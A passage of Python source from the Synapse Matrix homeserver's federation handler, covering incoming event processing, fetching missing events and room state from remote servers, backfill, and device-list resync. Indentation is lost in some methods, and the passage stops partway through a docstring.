super().__init__(hs)
self.hs = hs
self.store = hs.get_datastore()
self.storage = hs.get_storage()
self.state_store = self.storage.state
self.federation_client = hs.get_federation_client()
self.state_handler = hs.get_state_handler()
self._state_resolution_handler = hs.get_state_resolution_handler()
self.server_name = hs.hostname
self.keyring = hs.get_keyring()
self.action_generator = hs.get_action_generator()
self.is_mine_id = hs.is_mine_id
self.spam_checker = hs.get_spam_checker()
self.event_creation_handler = hs.get_event_creation_handler()
self._message_handler = hs.get_message_handler()
self._server_notices_mxid = hs.config.server_notices_mxid
self.config = hs.config
self.http_client = hs.get_simple_http_client()
self._instance_name = hs.get_instance_name()
self._replication = hs.get_replication_data_handler()
self._send_events = ReplicationFederationSendEventsRestServlet.make_client(hs)
self._clean_room_for_join_client = ReplicationCleanRoomRestServlet.make_client(
hs
)
if hs.config.worker_app:
self._user_device_resync = ReplicationUserDevicesResyncRestServlet.make_client(
hs
)
self._maybe_store_room_on_outlier_membership = ReplicationStoreRoomOnOutlierMembershipRestServlet.make_client(
hs
)
else:
self._device_list_updater = hs.get_device_handler().device_list_updater
self._maybe_store_room_on_outlier_membership = (
self.store.maybe_store_room_on_outlier_membership
)
# When joining a room we need to queue any events for that room up.
# For each room, a list of (pdu, origin) tuples.
self.room_queues = {} # type: Dict[str, List[Tuple[EventBase, str]]]
self._room_pdu_linearizer = Linearizer("fed_room_pdu")
self.third_party_event_rules = hs.get_third_party_event_rules()
self._ephemeral_messages_enabled = hs.config.enable_ephemeral_messages
async def on_receive_pdu(self, origin, pdu, sent_to_us_directly=False) -> None:
""" Process a PDU received via a federation /send/ transaction, or
via backfill of missing prev_events
Args:
origin (str): server which initiated the /send/ transaction. Will
be used to fetch missing events or state.
pdu (FrozenEvent): received PDU
sent_to_us_directly (bool): True if this event was pushed to us; False if
we pulled it as the result of a missing prev_event.
"""
room_id = pdu.room_id
event_id = pdu.event_id
logger.info("handling received PDU: %s", pdu)
# We reprocess pdus when we have seen them only as outliers
existing = await self.store.get_event(
event_id, allow_none=True, allow_rejected=True
)
# FIXME: Currently we fetch an event again when we already have it
# if it has been marked as an outlier.
already_seen = existing and (
not existing.internal_metadata.is_outlier()
or pdu.internal_metadata.is_outlier()
)
if already_seen:
logger.debug("[%s %s]: Already seen pdu", room_id, event_id)
return
# do some initial sanity-checking of the event. In particular, make
# sure it doesn't have hundreds of prev_events or auth_events, which
# could cause a huge state resolution or cascade of event fetches.
try:
self._sanity_check_event(pdu)
except SynapseError as err:
logger.warning(
"[%s %s] Received event failed sanity checks", room_id, event_id
)
raise FederationError("ERROR", err.code, err.msg, affected=pdu.event_id)
# If we are currently in the process of joining this room, then we
# queue up events for later processing.
if room_id in self.room_queues:
logger.info(
"[%s %s] Queuing PDU from %s for now: join in progress",
room_id,
event_id,
origin,
)
self.room_queues[room_id].append((pdu, origin))
return
# If we're not in the room just ditch the event entirely. This is
# probably an old server that has come back and thinks we're still in
# the room (or we've been rejoined to the room by a state reset).
#
# Note that if we were never in the room then we would have already
# dropped the event, since we wouldn't know the room version.
is_in_room = await self.auth.check_host_in_room(room_id, self.server_name)
if not is_in_room:
logger.info(
"[%s %s] Ignoring PDU from %s as we're not in the room",
room_id,
event_id,
origin,
)
return None
state = None
# Get missing pdus if necessary.
if not pdu.internal_metadata.is_outlier():
# We only backfill backwards to the min depth.
min_depth = await self.get_min_depth_for_context(pdu.room_id)
logger.debug("[%s %s] min_depth: %d", room_id, event_id, min_depth)
prevs = set(pdu.prev_event_ids())
seen = await self.store.have_events_in_timeline(prevs)
if min_depth is not None and pdu.depth < min_depth:
# This is so that we don't notify the user about this
# message, to work around the fact that some events will
# reference really really old events we really don't want to
# send to the clients.
pdu.internal_metadata.outlier = True
elif min_depth is not None and pdu.depth > min_depth:
missing_prevs = prevs - seen
if sent_to_us_directly and missing_prevs:
# If we're missing stuff, ensure we only fetch stuff one
# at a time.
logger.info(
"[%s %s] Acquiring room lock to fetch %d missing prev_events: %s",
room_id,
event_id,
len(missing_prevs),
shortstr(missing_prevs),
)
with (await self._room_pdu_linearizer.queue(pdu.room_id)):
logger.info(
"[%s %s] Acquired room lock to fetch %d missing prev_events",
room_id,
event_id,
len(missing_prevs),
)
try:
await self._get_missing_events_for_pdu(
origin, pdu, prevs, min_depth
)
except Exception as e:
raise Exception(
"Error fetching missing prev_events for %s: %s"
% (event_id, e)
) from e
# Update the set of things we've seen after trying to
# fetch the missing stuff
seen = await self.store.have_events_in_timeline(prevs)
if not prevs - seen:
logger.info(
"[%s %s] Found all missing prev_events",
room_id,
event_id,
)
if prevs - seen:
# We've still not been able to get all of the prev_events for this event.
#
# In this case, we need to fall back to asking another server in the
# federation for the state at this event. That's ok provided we then
# resolve the state against other bits of the DAG before using it (which
# will ensure that you can't just take over a room by sending an event,
# withholding its prev_events, and declaring yourself to be an admin in
# the subsequent state request).
#
# Now, if we're pulling this event as a missing prev_event, then clearly
# this event is not going to become the only forward-extremity and we are
# guaranteed to resolve its state against our existing forward
# extremities, so that should be fine.
#
# On the other hand, if this event was pushed to us, it is possible for
# it to become the only forward-extremity in the room, and we would then
# trust its state to be the state for the whole room. This is very bad.
# Further, if the event was pushed to us, there is no excuse for us not to
# have all the prev_events. We therefore reject any such events.
#
# XXX this really feels like it could/should be merged with the above,
# but there is an interaction with min_depth that I'm not really
# following.
if sent_to_us_directly:
logger.warning(
"[%s %s] Rejecting: failed to fetch %d prev events: %s",
room_id,
event_id,
len(prevs - seen),
shortstr(prevs - seen),
)
raise FederationError(
"ERROR",
403,
(
"Your server isn't divulging details about prev_events "
"referenced in this event."
),
affected=pdu.event_id,
)
logger.info(
"Event %s is missing prev_events: calculating state for a "
"backwards extremity",
event_id,
)
# Calculate the state after each of the previous events, and
# resolve them to find the correct state at the current event.
event_map = {event_id: pdu}
try:
# Get the state of the events we know about
ours = await self.state_store.get_state_groups_ids(room_id, seen)
# state_maps is a list of mappings from (type, state_key) to event_id
state_maps = list(ours.values()) # type: List[StateMap[str]]
# we don't need this any more, let's delete it.
del ours
# Ask the remote server for the states we don't
# know about
for p in prevs - seen:
logger.info(
"Requesting state at missing prev_event %s", event_id,
)
with nested_logging_context(p):
# note that if any of the missing prevs share missing state or
# auth events, the requests to fetch those events are deduped
# by the get_pdu_cache in federation_client.
(remote_state, _,) = await self._get_state_for_room(
origin, room_id, p, include_event_in_state=True
)
remote_state_map = {
(x.type, x.state_key): x.event_id for x in remote_state
}
state_maps.append(remote_state_map)
for x in remote_state:
event_map[x.event_id] = x
room_version = await self.store.get_room_version_id(room_id)
state_map = await self._state_resolution_handler.resolve_events_with_store(
room_id,
room_version,
state_maps,
event_map,
state_res_store=StateResolutionStore(self.store),
)
# We need to give _process_received_pdu the actual state events
# rather than event ids, so generate that now.
# First though we need to fetch all the events that are in
# state_map, so we can build up the state below.
evs = await self.store.get_events(
list(state_map.values()),
get_prev_content=False,
redact_behaviour=EventRedactBehaviour.AS_IS,
)
event_map.update(evs)
state = [event_map[e] for e in state_map.values()]
except Exception:
logger.warning(
"[%s %s] Error attempting to resolve state at missing "
"prev_events",
room_id,
event_id,
exc_info=True,
)
raise FederationError(
"ERROR",
403,
"We can't get valid state history.",
affected=event_id,
)
await self._process_received_pdu(origin, pdu, state=state)
    async def _get_missing_events_for_pdu(self, origin, pdu, prevs, min_depth):
        """Attempt to fill the gap between our forward extremities and a
        received PDU by asking `origin` for the missing events.

        Any events we do receive are handed to `on_receive_pdu` in depth
        order. Failures to fetch are logged and swallowed: callers must cope
        with the gap remaining unfilled.

        Args:
            origin (str): Origin of the pdu. Will be called to get the missing events
            pdu: received pdu
            prevs (set(str)): List of event ids which we are missing
            min_depth (int): Minimum depth of events to return.
        """
        room_id = pdu.room_id
        event_id = pdu.event_id

        seen = await self.store.have_events_in_timeline(prevs)

        if not prevs - seen:
            # We already have all the prev_events; nothing to fetch.
            return

        latest_list = await self.store.get_latest_event_ids_in_room(room_id)

        # We add the prev events that we have seen to the latest
        # list to ensure the remote server doesn't give them to us
        latest = set(latest_list)
        latest |= seen

        logger.info(
            "[%s %s]: Requesting missing events between %s and %s",
            room_id,
            event_id,
            shortstr(latest),
            event_id,
        )

        # XXX: we set timeout to 10s to help workaround
        # https://github.com/matrix-org/synapse/issues/1733.
        # The reason is to avoid holding the linearizer lock
        # whilst processing inbound /send transactions, causing
        # FDs to stack up and block other inbound transactions
        # which empirically can currently take up to 30 minutes.
        #
        # N.B. this explicitly disables retry attempts.
        #
        # N.B. this also increases our chances of falling back to
        # fetching fresh state for the room if the missing event
        # can't be found, which slightly reduces our security.
        # it may also increase our DAG extremity count for the room,
        # causing additional state resolution?  See #1760.
        # However, fetching state doesn't hold the linearizer lock
        # apparently.
        #
        # see https://github.com/matrix-org/synapse/pull/1744
        #
        # ----
        #
        # Update richvdh 2018/09/18: There are a number of problems with timing this
        # request out aggressively on the client side:
        #
        # - it plays badly with the server-side rate-limiter, which starts tarpitting you
        #   if you send too many requests at once, so you end up with the server carefully
        #   working through the backlog of your requests, which you have already timed
        #   out.
        #
        # - for this request in particular, we now (as of
        #   https://github.com/matrix-org/synapse/pull/3456) reject any PDUs where the
        #   server can't produce a plausible-looking set of prev_events - so we become
        #   much more likely to reject the event.
        #
        # - contrary to what it says above, we do *not* fall back to fetching fresh state
        #   for the room if get_missing_events times out. Rather, we give up processing
        #   the PDU whose prevs we are missing, which then makes it much more likely that
        #   we'll end up back here for the *next* PDU in the list, which exacerbates the
        #   problem.
        #
        # - the aggressive 10s timeout was introduced to deal with incoming federation
        #   requests taking 8 hours to process. It's not entirely clear why that was going
        #   on; certainly there were other issues causing traffic storms which are now
        #   resolved, and I think in any case we may be more sensible about our locking
        #   now. We're *certainly* more sensible about our logging.
        #
        # All that said: Let's try increasing the timeout to 60s and see what happens.
        try:
            missing_events = await self.federation_client.get_missing_events(
                origin,
                room_id,
                earliest_events_ids=list(latest),
                latest_events=[pdu],
                limit=10,
                min_depth=min_depth,
                timeout=60000,
            )
        except (RequestSendFailed, HttpResponseException, NotRetryingDestination) as e:
            # We failed to get the missing events, but since we need to handle
            # the case of `get_missing_events` not returning the necessary
            # events anyway, it is safe to simply log the error and continue.
            logger.warning(
                "[%s %s]: Failed to get prev_events: %s", room_id, event_id, e
            )
            return

        logger.info(
            "[%s %s]: Got %d prev_events: %s",
            room_id,
            event_id,
            len(missing_events),
            shortstr(missing_events),
        )

        # We want to sort these by depth so we process them and
        # tell clients about them in order.
        missing_events.sort(key=lambda x: x.depth)

        for ev in missing_events:
            logger.info(
                "[%s %s] Handling received prev_event %s",
                room_id,
                event_id,
                ev.event_id,
            )
            with nested_logging_context(ev.event_id):
                try:
                    await self.on_receive_pdu(origin, ev, sent_to_us_directly=False)
                except FederationError as e:
                    if e.code == 403:
                        # Drop events which fail the history check, but keep
                        # processing the remaining missing events.
                        logger.warning(
                            "[%s %s] Received prev_event %s failed history check.",
                            room_id,
                            event_id,
                            ev.event_id,
                        )
                    else:
                        raise
    async def _get_state_for_room(
        self,
        destination: str,
        room_id: str,
        event_id: str,
        include_event_in_state: bool = False,
    ) -> Tuple[List[EventBase], List[EventBase]]:
        """Requests all of the room state at a given event from a remote homeserver.

        Args:
            destination: The remote homeserver to query for the state.
            room_id: The id of the room we're interested in.
            event_id: The id of the event we want the state at.
            include_event_in_state: if true, the event itself will be included in the
                returned state event list.

        Returns:
            A list of events in the state, possibly including the event itself, and
            a list of events in the auth chain for the given event.
        """
        # Ask the remote server for the ids of the state and auth events at
        # the given event.
        (
            state_event_ids,
            auth_event_ids,
        ) = await self.federation_client.get_room_state_ids(
            destination, room_id, event_id=event_id
        )

        desired_events = set(state_event_ids + auth_event_ids)

        if include_event_in_state:
            desired_events.add(event_id)

        event_map = await self._get_events_from_store_or_dest(
            destination, room_id, desired_events
        )

        failed_to_fetch = desired_events - event_map.keys()
        if failed_to_fetch:
            # We carry on regardless; the unfetchable events are simply
            # omitted from the returned lists.
            logger.warning(
                "Failed to fetch missing state/auth events for %s %s",
                event_id,
                failed_to_fetch,
            )

        remote_state = [
            event_map[e_id] for e_id in state_event_ids if e_id in event_map
        ]

        if include_event_in_state:
            remote_event = event_map.get(event_id)
            if not remote_event:
                raise Exception("Unable to get missing prev_event %s" % (event_id,))
            # Only include the event itself if it is a (non-rejected) state
            # event; otherwise it does not belong in the state list.
            if remote_event.is_state() and remote_event.rejected_reason is None:
                remote_state.append(remote_event)

        auth_chain = [event_map[e_id] for e_id in auth_event_ids if e_id in event_map]
        auth_chain.sort(key=lambda e: e.depth)

        return remote_state, auth_chain
    async def _get_events_from_store_or_dest(
        self, destination: str, room_id: str, event_ids: Iterable[str]
    ) -> Dict[str, EventBase]:
        """Fetch events from a remote destination, checking if we already have them.

        Persists any events we don't already have as outliers.

        If we fail to fetch any of the events, a warning will be logged, and the event
        will be omitted from the result. Likewise, any events which turn out not to
        be in the given room.

        This function *does not* automatically get missing auth events of the
        newly fetched events. Callers must include the full auth chain of
        the missing events in the `event_ids` argument, to ensure that any
        missing auth events are correctly fetched.

        Returns:
            map from event_id to event
        """
        # First see which of the requested events we already have locally.
        fetched_events = await self.store.get_events(event_ids, allow_rejected=True)

        missing_events = set(event_ids) - fetched_events.keys()

        if missing_events:
            logger.debug(
                "Fetching unknown state/auth events %s for room %s",
                missing_events,
                room_id,
            )

            await self._get_events_and_persist(
                destination=destination, room_id=room_id, events=missing_events
            )

            # we need to make sure we re-load from the database to get the rejected
            # state correct.
            fetched_events.update(
                (await self.store.get_events(missing_events, allow_rejected=True))
            )

        # check for events which were in the wrong room.
        #
        # this can happen if a remote server claims that the state or
        # auth_events at an event in room A are actually events in room B
        bad_events = [
            (event_id, event.room_id)
            for event_id, event in fetched_events.items()
            if event.room_id != room_id
        ]

        for bad_event_id, bad_room_id in bad_events:
            # This is a bogus situation, but since we may only discover it a long time
            # after it happened, we try our best to carry on, by just omitting the
            # bad events from the returned auth/state set.
            logger.warning(
                "Remote server %s claims event %s in room %s is an auth/state "
                "event in room %s",
                destination,
                bad_event_id,
                bad_room_id,
                room_id,
            )

            del fetched_events[bad_event_id]

        return fetched_events
    async def _process_received_pdu(
        self, origin: str, event: EventBase, state: Optional[Iterable[EventBase]],
    ):
        """ Called when we have a new pdu. We need to do auth checks and put it
        through the StateHandler.

        Args:
            origin: server sending the event

            event: event to be persisted

            state: Normally None, but if we are handling a gap in the graph
                (ie, we are missing one or more prev_events), the resolved state at the
                event

        Raises:
            FederationError: if the event fails auth checks.
        """
        room_id = event.room_id
        event_id = event.event_id

        logger.debug("[%s %s] Processing event: %s", room_id, event_id, event)

        try:
            await self._handle_new_event(origin, event, state=state)
        except AuthError as e:
            # Surface auth failures to the sending server as a FederationError.
            raise FederationError("ERROR", e.code, e.msg, affected=event.event_id)

        # For encrypted messages we check that we know about the sending device,
        # if we don't then we mark the device cache for that user as stale.
        if event.type == EventTypes.Encrypted:
            device_id = event.content.get("device_id")
            sender_key = event.content.get("sender_key")

            cached_devices = await self.store.get_cached_devices_for_user(event.sender)

            resync = False  # Whether we should resync device lists.

            device = None
            if device_id is not None:
                device = cached_devices.get(device_id)
                if device is None:
                    logger.info(
                        "Received event from remote device not in our cache: %s %s",
                        event.sender,
                        device_id,
                    )
                    resync = True

            # We also check if the `sender_key` matches what we expect.
            if sender_key is not None:
                # Figure out what sender key we're expecting. If we know the
                # device and recognize the algorithm then we can work out the
                # exact key to expect. Otherwise check it matches any key we
                # have for that device.
                current_keys = []  # type: Container[str]

                if device:
                    keys = device.get("keys", {}).get("keys", {})

                    if (
                        event.content.get("algorithm")
                        == RoomEncryptionAlgorithms.MEGOLM_V1_AES_SHA2
                    ):
                        # For this algorithm we expect a curve25519 key.
                        key_name = "curve25519:%s" % (device_id,)
                        current_keys = [keys.get(key_name)]
                    else:
                        # We don't understand the algorithm, so we just
                        # check it matches a key for the device.
                        current_keys = keys.values()
                elif device_id:
                    # We don't have any keys for the device ID.
                    pass
                else:
                    # The event didn't include a device ID, so we just look for
                    # keys across all devices.
                    current_keys = [
                        key
                        for device in cached_devices.values()
                        for key in device.get("keys", {}).get("keys", {}).values()
                    ]

                # We now check that the sender key matches (one of) the expected
                # keys.
                if sender_key not in current_keys:
                    logger.info(
                        "Received event from remote device with unexpected sender key: %s %s: %s",
                        event.sender,
                        device_id or "<no device_id>",
                        sender_key,
                    )
                    resync = True

            if resync:
                # Kick off the resync without blocking event processing.
                run_as_background_process(
                    "resync_device_due_to_pdu", self._resync_device, event.sender
                )
async def _resync_device(self, sender: str) -> None:
"""We have detected that the device list for the given user may be out
of sync, so we try and resync them.
"""
try:
await self.store.mark_remote_user_device_cache_as_stale(sender)
# Immediately attempt a resync in the background
if self.config.worker_app:
await self._user_device_resync(user_id=sender)
else:
await self._device_list_updater.user_device_resync(sender)
except Exception:
logger.exception("Failed to resync device for %s", sender)
    @log_function
    async def backfill(self, dest, room_id, limit, extremities):
        """ Trigger a backfill request to `dest` for the given `room_id`

        This will attempt to get more events from the remote. If the other side
        has no new events to offer, this will return an empty list.

        As the events are received, we check their signatures, and also do some
        sanity-checking on them. If any of the backfilled events are invalid,
        this method throws a SynapseError.

        Returns:
            the list of events we actually processed (i.e. excluding any we
            already had).

        TODO: make this more useful to distinguish failures of the remote
        server from invalid events (there is probably no point in trying to
        re-fetch invalid events from every other HS in the room.)
        """
        if dest == self.server_name:
            raise SynapseError(400, "Can't backfill from self.")

        events = await self.federation_client.backfill(
            dest, room_id, limit=limit, extremities=extremities
        )

        if not events:
            return []

        # ideally we'd sanity check the events here for excess prev_events etc,
        # but it's hard to reject events at this point without completely
        # breaking backfill in the same way that it is currently broken by
        # events whose signature we cannot verify (#3121).
        #
        # So for now we accept the events anyway. #3124 tracks this.
        #
        # for ev in events:
        #     self._sanity_check_event(ev)

        # Don't bother processing events we already have.
        seen_events = await self.store.have_events_in_timeline(
            {e.event_id for e in events}
        )

        events = [e for e in events if e.event_id not in seen_events]

        if not events:
            return []

        event_map = {e.event_id: e for e in events}

        event_ids = {e.event_id for e in events}

        # build a list of events whose prev_events weren't in the batch.
        # (XXX: this will include events whose prev_events we already have; that doesn't
        # sound right?)
        edges = [ev.event_id for ev in events if set(ev.prev_event_ids()) - event_ids]

        logger.info("backfill: Got %d events with %d edges", len(events), len(edges))

        # For each edge get the current state.
        auth_events = {}
        state_events = {}
        events_to_state = {}
        for e_id in edges:
            state, auth = await self._get_state_for_room(
                destination=dest,
                room_id=room_id,
                event_id=e_id,
                include_event_in_state=False,
            )
            auth_events.update({a.event_id: a for a in auth})
            auth_events.update({s.event_id: s for s in state})
            state_events.update({s.event_id: s for s in state})
            events_to_state[e_id] = state

        # Gather the full set of auth event ids referenced by anything we are
        # about to persist, and pull in those which arrived in this batch.
        required_auth = {
            a_id
            for event in events
            + list(state_events.values())
            + list(auth_events.values())
            for a_id in event.auth_event_ids()
        }
        auth_events.update(
            {e_id: event_map[e_id] for e_id in required_auth if e_id in event_map}
        )

        ev_infos = []

        # Step 1: persist the events in the chunk we fetched state for (i.e.
        # the backwards extremities), with custom auth events and state
        for e_id in events_to_state:
            # For paranoia we ensure that these events are marked as
            # non-outliers
            ev = event_map[e_id]
            assert not ev.internal_metadata.is_outlier()

            ev_infos.append(
                _NewEventInfo(
                    event=ev,
                    state=events_to_state[e_id],
                    auth_events={
                        (
                            auth_events[a_id].type,
                            auth_events[a_id].state_key,
                        ): auth_events[a_id]
                        for a_id in ev.auth_event_ids()
                        if a_id in auth_events
                    },
                )
            )

        if ev_infos:
            await self._handle_new_events(dest, room_id, ev_infos, backfilled=True)

        # Step 2: Persist the rest of the events in the chunk one by one
        events.sort(key=lambda e: e.depth)

        for event in events:
            if event in events_to_state:
                continue

            # For paranoia we ensure that these events are marked as
            # non-outliers
            assert not event.internal_metadata.is_outlier()

            # We store these one at a time since each event depends on the
            # previous to work out the state.
            # TODO: We can probably do something more clever here.
            await self._handle_new_event(dest, event, backfilled=True)

        return events
    async def maybe_backfill(
        self, room_id: str, current_depth: int, limit: int
    ) -> bool:
        """Checks the database to see if we should backfill before paginating,
        and if so do.

        Args:
            room_id
            current_depth: The depth from which we're paginating from. This is
                used to decide if we should backfill and what extremities to
                use.
            limit: The number of events that the pagination request will
                return. This is used as part of the heuristic to decide if we
                should back paginate.

        Returns:
            True if a backfill attempt succeeded, False otherwise.
        """
        extremities = await self.store.get_oldest_events_with_depth_in_room(room_id)

        if not extremities:
            logger.debug("Not backfilling as no extremeties found.")
            return False

        # We only want to paginate if we can actually see the events we'll get,
        # as otherwise we'll just spend a lot of resources to get redacted
        # events.
        #
        # We do this by filtering all the backwards extremities and seeing if
        # any remain. Given we don't have the extremity events themselves, we
        # need to actually check the events that reference them.
        #
        # *Note*: the spec wants us to keep backfilling until we reach the start
        # of the room in case we are allowed to see some of the history. However
        # in practice that causes more issues than its worth, as a) its
        # relatively rare for there to be any visible history and b) even when
        # there is its often sufficiently long ago that clients would stop
        # attempting to paginate before backfill reached the visible history.
        #
        # TODO: If we do do a backfill then we should filter the backwards
        #   extremities to only include those that point to visible portions of
        #   history.
        #
        # TODO: Correctly handle the case where we are allowed to see the
        #   forward event but not the backward extremity, e.g. in the case of
        #   initial join of the server where we are allowed to see the join
        #   event but not anything before it. This would require looking at the
        #   state *before* the event, ignoring the special casing certain event
        #   types have.

        forward_events = await self.store.get_successor_events(list(extremities))

        extremities_events = await self.store.get_events(
            forward_events,
            redact_behaviour=EventRedactBehaviour.AS_IS,
            get_prev_content=False,
        )

        # We set `check_history_visibility_only` as we might otherwise get false
        # positives from users having been erased.
        filtered_extremities = await filter_events_for_server(
            self.storage,
            self.server_name,
            list(extremities_events.values()),
            redact=False,
            check_history_visibility_only=True,
        )

        if not filtered_extremities:
            return False

        # Check if we reached a point where we should start backfilling.
        sorted_extremeties_tuple = sorted(extremities.items(), key=lambda e: -int(e[1]))
        max_depth = sorted_extremeties_tuple[0][1]

        # If we're approaching an extremity we trigger a backfill, otherwise we
        # no-op.
        #
        # We chose twice the limit here as then clients paginating backwards
        # will send pagination requests that trigger backfill at least twice
        # using the most recent extremity before it gets removed (see below). We
        # chose more than one times the limit in case of failure, but choosing a
        # much larger factor will result in triggering a backfill request much
        # earlier than necessary.
        if current_depth - 2 * limit > max_depth:
            logger.debug(
                "Not backfilling as we don't need to. %d < %d - 2 * %d",
                max_depth,
                current_depth,
                limit,
            )
            return False

        logger.debug(
            "room_id: %s, backfill: current_depth: %s, max_depth: %s, extrems: %s",
            room_id,
            current_depth,
            max_depth,
            sorted_extremeties_tuple,
        )

        # We ignore extremities that have a greater depth than our current depth
        # as:
        #    1. we don't really care about getting events that have happened
        #       before our current position; and
        #    2. we have likely previously tried and failed to backfill from that
        #       extremity, so to avoid getting "stuck" requesting the same
        #       backfill repeatedly we drop those extremities.
        filtered_sorted_extremeties_tuple = [
            t for t in sorted_extremeties_tuple if int(t[1]) <= current_depth
        ]

        # However, we need to check that the filtered extremities are non-empty.
        # If they are empty then either we can a) bail or b) still attempt to
        # backill. We opt to try backfilling anyway just in case we do get
        # relevant events.
        if filtered_sorted_extremeties_tuple:
            sorted_extremeties_tuple = filtered_sorted_extremeties_tuple

        # We don't want to specify too many extremities as it causes the backfill
        # request URI to be too long.
        extremities = dict(sorted_extremeties_tuple[:5])

        # Now we need to decide which hosts to hit first.

        # First we try hosts that are already in the room
        # TODO: HEURISTIC ALERT.

        curr_state = await self.state_handler.get_current_state(room_id)

        def get_domains_from_state(state):
            """Get joined domains from state

            Args:
                state (dict[tuple, FrozenEvent]): State map from type/state
                    key to event.

            Returns:
                list[tuple[str, int]]: Returns a list of servers with the
                    lowest depth of their joins. Sorted by lowest depth first.
            """
            joined_users = [
                (state_key, int(event.depth))
                for (e_type, state_key), event in state.items()
                if e_type == EventTypes.Member and event.membership == Membership.JOIN
            ]

            joined_domains = {}  # type: Dict[str, int]
            for u, d in joined_users:
                try:
                    dom = get_domain_from_id(u)
                    old_d = joined_domains.get(dom)
                    if old_d:
                        joined_domains[dom] = min(d, old_d)
                    else:
                        joined_domains[dom] = d
                except Exception:
                    # Skip malformed user ids.
                    pass

            return sorted(joined_domains.items(), key=lambda d: d[1])

        curr_domains = get_domains_from_state(curr_state)

        likely_domains = [
            domain for domain, depth in curr_domains if domain != self.server_name
        ]

        async def try_backfill(domains):
            """Try each domain in turn; return True on the first success."""
            # TODO: Should we try multiple of these at a time?
            for dom in domains:
                try:
                    await self.backfill(
                        dom, room_id, limit=100, extremities=extremities
                    )
                    # If this succeeded then we probably already have the
                    # appropriate stuff.
                    # TODO: We can probably do something more intelligent here.
                    return True
                except SynapseError as e:
                    logger.info("Failed to backfill from %s because %s", dom, e)
                    continue
                except HttpResponseException as e:
                    if 400 <= e.code < 500:
                        # The remote rejected our request outright: surface
                        # the failure to the caller.
                        raise e.to_synapse_error()

                    logger.info("Failed to backfill from %s because %s", dom, e)
                    continue
                except CodeMessageException as e:
                    if 400 <= e.code < 500:
                        raise

                    logger.info("Failed to backfill from %s because %s", dom, e)
                    continue
                except NotRetryingDestination as e:
                    logger.info(str(e))
                    continue
                except RequestSendFailed as e:
                    logger.info("Failed to get backfill from %s because %s", dom, e)
                    continue
                except FederationDeniedError as e:
                    logger.info(e)
                    continue
                except Exception as e:
                    logger.exception("Failed to backfill from %s because %s", dom, e)
                    continue

            return False

        success = await try_backfill(likely_domains)
        if success:
            return True

        # Huh, well *those* domains didn't work out. Lets try some domains
        # from the time.

        tried_domains = set(likely_domains)
        tried_domains.add(self.server_name)

        event_ids = list(extremities.keys())

        logger.debug("calling resolve_state_groups in _maybe_backfill")
        resolve = preserve_fn(self.state_handler.resolve_state_groups_for_events)
        states = await make_deferred_yieldable(
            defer.gatherResults(
                [resolve(room_id, [e]) for e in event_ids], consumeErrors=True
            )
        )

        # dict[str, dict[tuple, str]], a map from event_id to state map of
        # event_ids.
        states = dict(zip(event_ids, [s.state for s in states]))

        state_map = await self.store.get_events(
            [e_id for ids in states.values() for e_id in ids.values()],
            get_prev_content=False,
        )

        # Replace event ids in each state map with the events themselves,
        # dropping any we failed to load.
        states = {
            key: {
                k: state_map[e_id]
                for k, e_id in state_dict.items()
                if e_id in state_map
            }
            for key, state_dict in states.items()
        }

        for e_id, _ in sorted_extremeties_tuple:
            likely_domains = get_domains_from_state(states[e_id])

            success = await try_backfill(
                [dom for dom, _ in likely_domains if dom not in tried_domains]
            )
            if success:
                return True

            tried_domains.update(dom for dom, _ in likely_domains)

        return False
    async def _get_events_and_persist(
        self, destination: str, room_id: str, events: Iterable[str]
    ):
        """Fetch the given events from a server, and persist them as outliers.

        This function *does not* recursively get missing auth events of the
        newly fetched events. Callers must include in the `events` argument
        any missing events from the auth chain.

        Logs a warning if we can't find the given event.
        """
        room_version = await self.store.get_room_version(room_id)

        event_map = {}  # type: Dict[str, EventBase]

        async def get_event(event_id: str):
            # Fetch a single event from `destination`, recording the result in
            # `event_map`. Failures are logged and otherwise swallowed.
            with nested_logging_context(event_id):
                try:
                    event = await self.federation_client.get_pdu(
                        [destination], event_id, room_version, outlier=True,
                    )
                    if event is None:
                        logger.warning(
                            "Server %s didn't return event %s", destination, event_id,
                        )
                        return

                    event_map[event.event_id] = event

                except Exception as e:
                    logger.warning(
                        "Error fetching missing state/auth event %s: %s %s",
                        event_id,
                        type(e),
                        e,
                    )

        await concurrently_execute(get_event, events, 5)

        # Make a map of auth events for each event. We do this after fetching
        # all the events as some of the events' auth events will be in the list
        # of requested events.
        auth_events = [
            aid
            for event in event_map.values()
            for aid in event.auth_event_ids()
            if aid not in event_map
        ]
        persisted_events = await self.store.get_events(
            auth_events, allow_rejected=True,
        )

        event_infos = []
        for event in event_map.values():
            auth = {}
            for auth_event_id in event.auth_event_ids():
                # Prefer the locally persisted copy, falling back to the
                # freshly fetched one.
                ae = persisted_events.get(auth_event_id) or event_map.get(auth_event_id)
                if ae:
                    auth[(ae.type, ae.state_key)] = ae
                else:
                    logger.info("Missing auth event %s", auth_event_id)

            event_infos.append(_NewEventInfo(event, None, auth))

        await self._handle_new_events(
            destination, room_id, event_infos,
        )
def _sanity_check_event(self, ev):
"""
Do some early sanity checks of a received event
In particular, checks it doesn't have an excessive number of
prev_events or auth_events, which could cause a huge state resolution
or cascade of event fetches.
Args:
ev (synapse.events.EventBase): event to be checked
Returns: None
Raises:
SynapseError if the event does not pass muster
"""
if len(ev.prev_event_ids()) > 20:
logger.warning(
"Rejecting event %s which has %i prev_events",
ev.event_id,
len(ev.prev_event_ids()),
)
raise SynapseError(HTTPStatus.BAD_REQUEST, "Too many prev_events")
if len(ev.auth_event_ids()) > 10:
logger.warning(
"Rejecting event %s which has %i auth_events",
ev.event_id,
len(ev.auth_event_ids()),
)
raise SynapseError(HTTPStatus.BAD_REQUEST, "Too many auth_events")
async def send_invite(self, target_host, event):
""" Sends the invite to the remote server for signing.
Invites must be signed by the invitee's server before distribution.
"""
pdu = await self.federation_client.send_invite(
destination=target_host,
room_id=event.room_id,
event_id=event.event_id,
pdu=event,
)
return pdu
async def on_event_auth(self, event_id: str) -> List[EventBase]:
event = await self.store.get_event(event_id)
auth = await self.store.get_auth_chain(
list(event.auth_event_ids()), include_given=True
)
return list(auth)
    async def do_invite_join(
        self, target_hosts: Iterable[str], room_id: str, joinee: str, content: JsonDict
    ) -> Tuple[str, int]:
        """ Attempts to join the `joinee` to the room `room_id` via the
        servers contained in `target_hosts`.

        This first triggers a /make_join/ request that returns a partial
        event that we can fill out and sign. This is then sent to the
        remote server via /send_join/ which responds with the state at that
        event and the auth_chains.

        We suspend processing of any received events from this room until we
        have finished processing the join.

        Args:
            target_hosts: List of servers to attempt to join the room with.

            room_id: The ID of the room to join.

            joinee: The User ID of the joining user.

            content: The event content to use for the join event.

        Returns:
